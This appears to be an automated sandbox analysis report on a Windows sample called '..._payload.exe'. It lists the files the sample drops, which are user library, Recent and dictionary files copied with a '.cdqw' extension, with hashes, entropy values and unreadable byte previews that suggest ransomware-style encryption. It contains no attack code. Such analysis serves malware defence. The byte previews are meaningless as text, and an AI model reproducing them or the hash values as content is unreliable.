                                                                                                                                                                      Preview:%PDFTasm.Vj...9(c1.M...r........1.cI..>f..+...U..~....$.3V.A5...6,..Prm^*.3....KDW/...>.....4.....[N....4......ITE.%..J.>..'..<...W-(......a.%K.y '......k'.0EmJ.......y.R5..L+N.J. /$_.]......-.......$.Tu..X...Zz.......E...6.i;.G...}4...W...Y5uB.|.....t...3.x.&-t<%.2.aY..].A....Zj..K.....&..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\UProof\CUSTOM.DIC.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350
                                                                                                                                                                      Entropy (8bit):7.2173365778442795
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:QIaJKXUWvYE+BoeO+6/yxocLxyDLX21aRrsmq7Se7IZWJylKm/TlnIS1WdNcii9a:QTJyvvl3+UpcLxyDLXRPenqomrWSUdNX
                                                                                                                                                                      MD5:B377459698EDA080069B667A768171C9
                                                                                                                                                                      SHA1:29F35D4488B145BA6E889472E0C3F029D347F13A
                                                                                                                                                                      SHA-256:A05B95841F5450340C78D949411CB652B563E3152AAA8B5CA8C368BD01D4A224
                                                                                                                                                                      SHA-512:B9AF19E99121591D510EB167065CCFFEA7891A54EEE835AE3E9F7BE01AA0E68D3C90B976035E6DFAC4E7E954A65621801422CEC8CCA9FD86D56344C7CB945A6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..j.oz.p.....c;e.....F51.OJ.._..$.Y.b.wm...8.0A.S.y.3Y)rEep_..7.!4...j......6!..?...Cv...2....x._.#....u.M..".n.p.' .....U.a...A9...oN.?Bq....P..]2...47.^..RJg..)#w.8<..q.U...%P9Jxv.z......|.)E..[-...(..u:..W/....q<...$.-t.E3..S..>...\.s.MzZ.k%p.uB.V/.wT..2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1352
                                                                                                                                                                      Entropy (8bit):7.839620154083292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Nw6hpmXNjp6cIOakmqOtKfZz+HhJPSEUZqq8nTE8ocYz9kmXNB/1O5EAtRXMYIL4:Nw6hpkzOIf1+HhJPSEUZsTR7w18lXMHU
                                                                                                                                                                      MD5:7D70FFAE284652BB55C33F8B8A234421
                                                                                                                                                                      SHA1:AFF43C11587EBB1E7F17B4A47E417378D09984F6
                                                                                                                                                                      SHA-256:7BDB207C7391F335A3B00D344A7B4EA1B259AF0BB12DF1094D308B8912631789
                                                                                                                                                                      SHA-512:4FAC25E68C6FF2A482E6BD2A74659A03C6EC3187737178519FF81080001B943D536B503970DEC6E3F114669887EBAC43A2A98A9A085B4B56A38112B09026A603
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb.}..R..E&[.X.!.....M@...I*.U.8-cZY.O.......:.a.._..D..........U.0k....#.O=...X.:..........Gy6.Q@...../.F...<4&I.W.....>..5.;..T.fz8....3....9T.....K..&.._<.W..m...rd.}...u.d... H..'q.j..L{(.D.*.....0...#.......<.JE.z..4.hT4%.4..n..5]..Qt~n..3.8.....i..X..%.d..7\l.z....R...^:.H.BE.HH.y.CZ).5.<.f.Hk.[..km..l^..^.;..../..fY|.cP....x.A..ds.m6.}.V/..........$u........~....n.E..F...O.)....V|=9.....]....Vl...v}-$...l7E,.S.%.TD..f).-..u<.\.....jh.. ..b..`...X.......cq...*"..%8..yN...=3.";...........v....?........U.8s.3.k.Zm.X.....M..}0....Z.f%.....?..c!.)0Y..A.....P.%...D..n...4..}...$..W.V3.iFx........X^n~.........\..^L..4;...MO:..'..@$,..LnmE....B.. 1..l...v.K.g.B.f.f..VI.Cia.y..*z.P..N<].....k...q..u:.}<FO.w@6.h.Hn0!.......<.....|.g5F..#..Ag.J...d...t&.......^8...?*.r.%.$.u....._0..Y2)..IB.%.As..L,.u.bB %q.W.})..c.,.}....c'..:..*.L.W_..N....^.,l.......?[+.f....-.B<E....3.=..3t(..h...T.H..}.....@..Mm.....T.x'.../.....C...L.;.la....k..s._.#.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2424
                                                                                                                                                                      Entropy (8bit):7.9196043738215485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3xN7X9He2IHmk5VBlBnZyACSUDc3+ZeTJEkLMFiwhM1Nj01v0DbfbD:BNBHe2635TgfSUTMaFiwhOjnfX
                                                                                                                                                                      MD5:58FD3A011C2139349B638948365F64DD
                                                                                                                                                                      SHA1:3401E8EA347E4B62BB3124526347CC58F0D2685A
                                                                                                                                                                      SHA-256:79311A18A19589F1BAC61408E595136F3BF341084D01986C6B903A8DD44D8D50
                                                                                                                                                                      SHA-512:16C987595BD990EB1FADE5B8C57AFD22DCC6BA6026ECB5DAE3E9A8074A99F6DF1EF69E8BF41CA30085C10918D7EC08730DA16AB5C0476B8FDD2A4DB3CB4A4A6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.i}XG3.....x..........:-...@~...,..b....|...y..C.x.95..a...............i8.y.....97.[B..x.E7[.^. !X.0...u.@....i........_.....u.../...W../'......2....[]./..E.....C.......0.S..qe..s..G5w.Na....Y~.........iV.8.(Kx.c......\..U.......uO....d.....,..*..i..'8..N..S|..... .'.W ...../b.;.............qU.YW03z..{R....~...=n...5..6..8...*...x....;...^Su....Y.m....k.y.F...{tJm...5.'b.o$t.(0....H_....e..?..)..WG.].d4....X.$..J...J_....3R.w...,.&...B.1..uo5.....^.>.....6..4..G<.........x.e6JY.5.....+..E.9....v.....Q..G'.>c...|.[..x.AF..jB..-.I^hd..w...&..xQ.~.\P@0......I.=*.......(%..*......M>L...9|;.#.g..~3,.-...F_t.E...qt'5.............G.9.....U....)_i.....M.....C.q..N..2.S..]F..g... R._)...C`..++.......q..lrg.a.D..}.$.k.?.*k.d.. U.m.lrg....q...{..r.~-.DaU...Hj.=Qn.7.....Y.7..+....-..!.Q.q$...B.R...33i.?....V{.../U.........D;..<.P.>`............d!g.....(F.3$.%.....N<.ez..C).ue.5.TE.X..](K.^.YWG.....\.....`...x@T.).=.."|f.......O5."..R.HM.2C>.......

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2381
                                                                                                                                                                      Entropy (8bit):7.9254174691554
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:M4oO/KUmCuiETk//L0skAbiI26nuTb9kAaIHna6aXSTLL3a8vGwsWmVoBD:oOhmCuHTk//PkAp69kAaIHnaNiTzGzWt
                                                                                                                                                                      MD5:ACFA99D1477C3D2AFE327E88B7E611A8
                                                                                                                                                                      SHA1:23FCCC1B5EAD7D281C870417F8EBE6B130DD7F51
                                                                                                                                                                      SHA-256:FCE42D3A6C658B5B28F8709C33BB31A40E6D4DE91147AA71FD99CC9930652AE0
                                                                                                                                                                      SHA-512:6491702A7D9AC5E42FB68597A6787C04B885FBB179ACF5069C45734B2A832B3EB7281C6F4A9E0C4F2BFF2C036319DBFF5C5BDAC1941E29D4CB37DDD33F39C059
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........nF......4...Db.e.n.".....*.n....[.).5E...).u......S..)....N...0.&..n'5Ht..b.s........@ .J... .">.{...[.8.4j.....m........$.B.[.5L..h/...`d.u.>+.....e...3...qF.......~.y.{2....?L(....x>.0.R.....kL..-J.zK3&"..|<>*..K...$....r....N.F..rp......!.c.D.".MEZb.7.i:....~3Wp1.Odm{v....(u5..m."Z.../.....j.|...NC9}|*..10.\..o.7:..BoO....A3R.....%d....B..rl.F ..R.S*...G.T..V...m.w..$..j.xH..-x..K<K]Vi.......d.r.lZ..x'..bPi...d.k...+N....n....=....l..O).8..|.QJl...&..V..lt..._.......py......N0r..W.)..& ...!....(Q.....;..0..[K....1!....u.&#*......MI....=...-...d.C.K..7.*!..t$\.....,,l...{..So CH...3.#7d...v3v'Y....",...d.p.Y.....&r]j...H.;0.B.<.8..M.F...6q.+...c.9'B.}|."......D.....,....w6..XmT.......f[.........*"q.. .....c...u@....|.S..aX,..Q....W..|.:-1.!QxO...s..(>.=.e..r_.V.-K..:pe"|.;A.dU5..j;....v..M0&a8.x.N(...}n..+.W.V....62.=....?......;|{9$.......b.uP-IY....".X.L..[..../.!.......-..[K..G..d..+...Sw...(g.......#G..d..r.......P.P.c

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2398
                                                                                                                                                                      Entropy (8bit):7.931587966854671
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PdokLp/O/2+EHPpbkF9ExrvNm6kH87/cwV68iIcf+QgSG23416gD:nV62+EHPpbkF9EJV8H87Yhf+Q1G234d
                                                                                                                                                                      MD5:BE03FC87B7C0FAC3653D9B318B75661D
                                                                                                                                                                      SHA1:2124E053CA9E4C4D4CE93706AC72111BD2A1300F
                                                                                                                                                                      SHA-256:35B56979CEE810848DE125F0488B728C36AF774143005D2AD76F0CFFA49AE043
                                                                                                                                                                      SHA-512:57D20B11640827985DAC58CE67871D7DECE91A5EDDB33353187A681E518A62DEC71FE312BBD1CF45E72B50303E096900E19D96E4DCD7444DE638B49BC8D9762D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly.5./.....-+.#.Q..r5..Q..m...j..y.c=....;....{._..'.?. .Lw...|..0..1........2-Z..u.n.%....3G...A..{[.f.......7+..r.<.....+e..9..;...d/..TcDS[..@(.G%..c.........O.a.....8._.WC...u"..z%.B......T. b......y.:.d.i..S......a.^.@..S.._.~.U.`.\.g.r...y...`MFliDj.$@.....y..O.J.....iI..\..q+...N...;.1.\.....i(!...h>.D....4/.........o|.....0...puzm.z...8..[4.h...2q.LZV.,......Jf.K...W.Br....K.v.6=N.....>.pG*..i....v=I.....}:.K)#.y<r..}.4.L.....S.Y..&..*<j.L..U.%.....;.8'...(IP.v..\........g.qB.c<r...fV.9<....4.1..]..L....E.s.......:....fR9.<.T...r..........UB.nv......|.t........+....c.,._..u..'..[..~...O\..|.F..c.3./..i....32.K.Q...%.X.....A7{.j.p....tD..`Ip.[.....d*....Y....ZQ=..(..x|?2....0|....{`...IT..-.t.N....h.&.b.@..I..#T.yT...2...>L......7.....n..J/..'I.$.tw.....+.+V#T...C.q5 -...Cr+.!`.>c....K6.XAt.f.#d5..B..X..m..nX..,.h........S.O....e\k}..Kj -......T..S......O2..B..#-x.d..+.\...a.2<.G..J..>%ZS..t5o.;;......H./r....3pX.^.3.......n.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1358
                                                                                                                                                                      Entropy (8bit):7.853821842836099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YpXk8aByx8oLYvO4tYHVi5pRaUkqw6sdID1ntRe3KJtKJuRGPlrL9vxT2bD:Q7rx8outsJGDttJttqlHAD
                                                                                                                                                                      MD5:989F43ED90DD2ED5067CD3C017C7BF27
                                                                                                                                                                      SHA1:4F38467F6EED06F71D1C0AE30BBF1BC46504017C
                                                                                                                                                                      SHA-256:F9848C2752C80F2A05C361DCA5E72759FF04BB8417D602FA5DAACE092EE180AE
                                                                                                                                                                      SHA-512:FBD4F3E6D984D4CF7A0A97A6A916001C627AB38D38CA78AC82B790A6EAB98628F4302005E632CAC6912BEC12DEF8F53F0746E6538FCD539AF1417FAEFC1F03EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...|..I#z. ....6}|.%.~..o.s6.k.&......d...c..H.Y.).z...M.:E....S.......9y7.......?|.M.O:...=.\g........Y1...f>7...O.;Y5Y9....l....j.>w..(......#.h.)....+...?-q..2.J.w....L...Rv..b.` H...3.|..rdXf9..f}.#..+E4.mz.~..4......$..c...8...b.O....n..)jc..)Ep"..sP...H....i?.D..1..Ot.B.$.b.T.Z.....7#%.oB...YY...*&.R..F...Q.f....B.0a#..e].;7...</.M.G6...D.G(.$Zn.$,..<.f..3fw........dwW...).>D....'.([..V.&.?..q4...>.%PG.<..q:.<......~.?y3z-.Q...ov...e..MAV.l^.s.......U?o......b.V.A........+Q.N.R.]...=k.. ..I..u|....."....b...7.A...+.6.0Cv(..,^.>w....T.=.?...E..Z..^..I...QP.e.....ja.{...c..]...w..J.O......o2Q..*.n6.|}..^PR....`4...O:.L.......e.[.\....gs......ZB...=.wu. ..-m.c;..i}.o.<E& .0RS.*e......{......?.|[&.cob.\.6..6.x.u9Gi.[..- c....$...Z..Uo.@DAM.$E........:8..Y.4..V2...c..$..M.......M...m...3.....%TnH...e...A..=....V.{Yj..~Y.....*}!...M..fH*..).b.7.F......{.%......S.QH.."..ab...9.....6...h....\H}...Z..C.,{T.....q.2b..\.wXZ.........{.WJb.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2409
                                                                                                                                                                      Entropy (8bit):7.906571854420374
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5d1+LwHWl3yhD7JuFqeMjTTWTG5GKj6HoKmOcILg3+mpZCYxzSmvwD:5U1eEFUnTWpIxILg3NpZCYc7
                                                                                                                                                                      MD5:3B03D0B18A03B9B6F2B09E9124AFDA23
                                                                                                                                                                      SHA1:4821C376F44BF13DDA9B84B34FA7BF8BA28DF32E
                                                                                                                                                                      SHA-256:068069201C71F59B89068C6AAE60B9FA3E270F81622C7256C24580615A31D328
                                                                                                                                                                      SHA-512:BD4040CC3B78CD211B5DB375004B324930C1195BEB9951954EF1C39F1E484F315FD53B7A3CFD0ED5743659A6DC09E9A39A4ABBB2EC573B0121AC9599DE1AC10A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.%.'.hKq.n.JR.>..^.q..s....sq2.....?Q.Dm....b...R`.....F...G8.....8.......m..!i......*....kq..q.l..;6..o.f..~>.|ug..y.J..J. ..`.}....}.....$...HW.v)X.V......|s......XQ.W.G.....0\..d....z..<..4.R#...Jv..&f......K(....3..d.`.|N...$.....}...h......O.i.E.\b..o..0...H.Lj..&..O....Z.....v.E.,...U...U.L.u..3&..`..A.2$.....v.I.x.R.n.X8#.1.}...L..<|..!....P....".{.D..+d1D.D..6.0...v...!.~.W ....Q./J*......k....e.j.....S..a../...................2...qgjPi..$L.x!....-.u....O.`g.y.p..(-=Pm.5BX.Zf}.fm.{.....u......3F..N.~......>.l..........D...f.P...-.L_.}....Dq.:.v.i.a...%...7..v.[9...[.....*...R....B.V3..Pv8.....U34-..`.........Y...^...]..k.b.=x...;7`...dg..hc.Zzh.g;...|7N.,..D.8....t....[D6vq\.L..z^....#..e.T....Z.4L..O+.&..m6.....G..U90..].y..83.s..T..]..#..Y........|.M<o.|..........M...c...EL........y.....P..d.#.....\.6.:+A..G.F...h...c.B...*..Tl.9....K..N..gM.<..g....V.....B...^..#....|...4..f.J1...E.*.....|...H6.-......S$D.Z..dm.#|Qb.@.n.0.o....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ANHVHMGQLM.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.861384421941496
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EQlbBD3wOMfZriTVokQtz2Uw62PCN/udvocHHbwx9JZTt/TS9tuJoEN7T2bD:BzDg7ulQtKUlt/uvocnboT5tVN7AD
                                                                                                                                                                      MD5:81161F3D475DF99F9A32EC39673283AB
                                                                                                                                                                      SHA1:83E185A515C938EFF7408D83B2E91A5F5B6FE686
                                                                                                                                                                      SHA-256:EA73C3978D11457D46243B13CB3A4C91363D831BD78BE27AFD8BE38D96E92FF8
                                                                                                                                                                      SHA-512:6196D47C84F3CD7312038993EF828CAD6110C42DA496C8F951142AC2C667B46593F00AB83E6C0F198C9BAC790622F9D4AF8D62D0F2C360BFA33D7DD99D5210C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ANHVH.{kc.t<\.i...B6.u..).<.d.G..L........%...g..V.<.P..X.2..a.........O?.T[R.$...........B..Z1.TgIld.$..E..Oq....X.*u.+.<...a".TVJ.#k.^.aX..d.k......Jf2....\<..[.S..6S......\s...Q...m..?...........x}/..0..D7.+..N....L....=N..0....&W..Se.eq.=.. b~)x.U.x...A.!....._.........:........u......jk.2.>J_.....|....[.'.........\.Q.c`.u|..N.`..~tq.!b...V.....m.q..}.1_..Xo....XJ..rW...d....2(..>3j..C..?....;.|U.z.o8Dc.6.:%J.J....M.$..W.L........=V.......p.(........p.#..N.k.....m.O.7.9M.G..F}.2m....5(}9..J..a...W...r.....WJ{.~...L2.......oK ...R....0k.a:.]}.w..u28K...H1............:.0..F....3......B.#:v.Oz3.Xj.K.p.0..._.Kk.$...?..B..yV.8.V.O..$K...&....9.C6...)9..'..._........|\i...3.:S...u.~1j.......e...T...AD....O..+....Dr..=W.v.v.............@@e.nJy..j....rc$R..n(nU...6.......s.......W..Q..2..^0....h....<........zG."..K/.\O..n..!.......\....S.u.........b]/.l...pWR.u..t....)\.8C^..<..,`..ia.O...^F.h..pf.x...|R.x.....Y=-.o...*..Td..)^..X:j....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857644803274317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PZ1UY88fCRo9EuZnpQrBOyMiG7FVnhi91ehe4l1hrmM8Fa3rsk7ktXH2bD:B1+LR3unCgx/n80fh58FmpkSD
                                                                                                                                                                      MD5:2DD10E474A2E838E54FCA13562F55E0F
                                                                                                                                                                      SHA1:915CC8C3AF5B31B2E3FFF59DCF581D7A0592D9DB
                                                                                                                                                                      SHA-256:97D9C790ABFC1715F66005E4F7AF1D0CF119A60347BF2577CEC5BB1204765023
                                                                                                                                                                      SHA-512:47407BD85AD5858486187215B8DEA74F3BFAA8013F850E39EA2CF07EBB161E7D6375A8AA35EB997C6CC9FCC8A144733008B9EEA3584609DE7776AFE9A765F65C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJ.....X(.?m...-.V..?C.^.i.I.`.X...X..DZ.B...3...n.A.d.i.v.Nq..=,....U.....2....6.}..Y@....v.o>...#&o..j.<(..HG.>.)[...........F.......O~+......f.F..)j....6S.wb]<6.1.....) ..i...<..P...CQ.0M..p..`T....B.}.*.xk.....<}C.*y....P...$j.B-...4.../W)_....Dr|3.+:..J..ch.....0...]..Gw.2...(.KQ.lW.O.V...N.=..`..%.1....'._..:..P..Y.)..[..'.O...jk.g.8.<..v...wCi3uB..t......x@...@.H.)q[s.}.m^X...Gl.0..9.X.r.'$..&rb..@.T.b...X...9..q.m>A2.....W.|.....z...a...r.#..Uy...T.y.!z..X.3.I.y.L.8.q..6.d.+..S`...........5.|.L4x..0J)`N.>d...ut.%.)..9.f.>z.I....@.~.a"f..F:.......h...S....v.i.....X...zf.R.)...vb...R......[.`..o....Z....F..Xt]:.^,.).n.UpFA..F......l..~..@...2...NR.a....1/..:.)....s.W.@......B..KY...a.."..~.HP.......tL c.T......)'*..2...fS...FP.+sU...o~..W.........o.\..../...K.bfu.N.f.U.Sk.t.TE......t....T......~)w.k.\....w.....I|/..n.....`rr..A....%w._`gX1.a....@TU../...qu....2. e.>n.y..w.......w`.........WB.....J..Y.h..3.v..5.2M`B.....<..<.!bQ_.7.-..aIb

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849647420372744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RG0SudM9YqIvkn5QOf8zg7UVvfYcY6obOJgD4cvDa/9tLTK7cNw2bD:HNapWmae8zQUxYcY/TccvotvKoxD
                                                                                                                                                                      MD5:F58F6FF0FC3BF1873665C66373F5C7B6
                                                                                                                                                                      SHA1:09472E35014418C480A614F111B5DCF4D3CB2BC2
                                                                                                                                                                      SHA-256:7AFB9FB7F23963703B6B2E62D9CEDBBDE8FD323334C0AD2812C6DAC7924242E9
                                                                                                                                                                      SHA-512:253106F4F7A041A730017916F26B44612F6D2C860358EA4A86C585FF607A79D43FEB03F493DC4449FBFDAC91F5ABDA062FD1CBB3919FDE71D88D7015414233C4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJ.4.q...Q-...$8]ug.YE.v1Fk#b...n8.8..I..U..[..`.<.\.A....7.?....J.CEN....O.l..\..p..t.....l.....{........m.d..{.....^s....Z.9...,..&...yq.....!...V...oe@...m..~5.2.Jy.....l.}..~.*.LA.j@.D,....s..7c...OT..{.........eb.uC.a{C#.>.....Ax.......m....[...g..R.......|....W.x,t.&...)..u.W....@=.D...a.5cD#.....-..P7F%.*b...'.BZ=...D..~b...l....y...Ic.No.~.gY.N.&..-S..Cq..(@..O.....n`..K.8:W..2.....i...9..|..G.P.&=.{'. ._!?.....%V.1.!.\=..siu....+.p...@duZ2..(S..G..Y....`...btd.m.[xR...Q1.e...7..\...@[#._.8M....m8..fJ&c#..O.0]..z..Z...G......dG8T.Ux.......L!b.9..P..t..5.. V...(..3...}...Y.N.R.F....w.....o;SsZS)8..,!_...b....v.....j...Q9.C.j.TE..Y....P.f...E.aK..7U..=....m.d....d....?......../Asn=.t.~..)uy...4..?.I.L1....#.....i./.....>.c6..9...x.-.N....Ts.W.2...3......X..I..UD]...M....&..]$..^n$k......~..zA.1%...7./Q.X..8....%X..o...D.y.%E}.R.RB.....^.....P.......G.Ra...6.=}.....*..%9.]...9.C....~B./...>#`..i...W)...e.....7.N.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.855213670731229
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RfgG4Ge4njSq2wjA6D9NgZsZQzORdN+9ij0ToOI3wSN5DBjw3p126UUsYgrfQiVk:RYQeixfAG46ZQy7QG0TtI3wm5DB4aLUL
                                                                                                                                                                      MD5:934D7666A4997C98E2C4729CEA39E9C2
                                                                                                                                                                      SHA1:DC53A9124323F10E23124C530718872E6AC04826
                                                                                                                                                                      SHA-256:F0C77B323226D8FD6ACFF80EE5DEDD3C9FAE31D84FCF75EC66114EB92B1171EF
                                                                                                                                                                      SHA-512:4C15F5C889B5E1F243DBA061392517075F3627045125D6F68AB42D2FBAD8DDDF72535A4A4008919794D4BBB5602EDB50B437B48C93F2D9FA5C18843DA7CEA7BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJtb.W</I:.?t{.{yIe...fu.:..a.!.a....p...5.>.yS.^X=... ...T...x.0.Z.$.%.&t~.i?.....;XE.JbJ.....Y.9.D...|b.c.Ye.\l.(..5~...k..azy.@..z{..M-..T...!...7.p.%..... .X."Q@.....n...P}..Z.....8\j.5.>z...7.....7..5?...d.....h)...].....*..f.j..Bj.)..Z.I~.............9....vG.......uD....W...X~\}....XH....!..\`S..4.2...p..X.\6.......9.@y..=...fr.l[.w.D...y..J...}v .s...{>...*.X.>B..>."M6..$`1.R...J.?.......H...).4.39..{N.& 9..,n.x...p..<.N....g.......]T.t<..4[RA.J..H0ZvD.i.EAk.^e~.5M.K.UM`..l.)c.}...........{.\+{....R....H.Lx.hM......nQ.......?._X....I......v.L..t.$..Z,A.N..D`Z.3.d..2.......k[K...'P.f..>?.7...5.`.....5.......W..@8...4...3|VY...l'A.[.G}.t..9..6_...|4...5..6......tT.Fmc.....k$.._=...)l....j..u.b.....Xq$5.Y..]8..j.L........E*.N.E....Qc......G..j..~...PC6....1.t..%...O.....9.*..4.......1. ..7.n......t..#..d.b.U...0.w..,<..J%./Xvb..now....{.....].i_......./..7.) ..#.k..'L..>..G..2...E.......D...l$..k.v....`+m..g..."..!C%.;{...q&...A.;.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\BPMLNOBVSB.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866589585133114
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:l//7RHLxmg8Rjc5yv+kjyWIFqXvd/0r5P8PLVrA3Gkq4A4x4eV2bD:l/Vrx5rpkxJ/6lP8J8p2fD
                                                                                                                                                                      MD5:E5377059892CF64C8B80EF36F35C3513
                                                                                                                                                                      SHA1:B8C86E2BFB913CC1E8A14BB0BDC479DDD81F9EE2
                                                                                                                                                                      SHA-256:557062B298EE2C38ABD9950D86BE3344D39164412DA5DDB78E17641033E7E14A
                                                                                                                                                                      SHA-512:C41BBAA2035F8215A1FBB57EFF8EC91A8F4E9F8EAE302452D3A3739A5940C28EFC717C6E197B0E5299AC1E980D2B881D5D1215A6AA5A2A1288593EE818E193C5
                                                                                                                                                                      Malicious:false
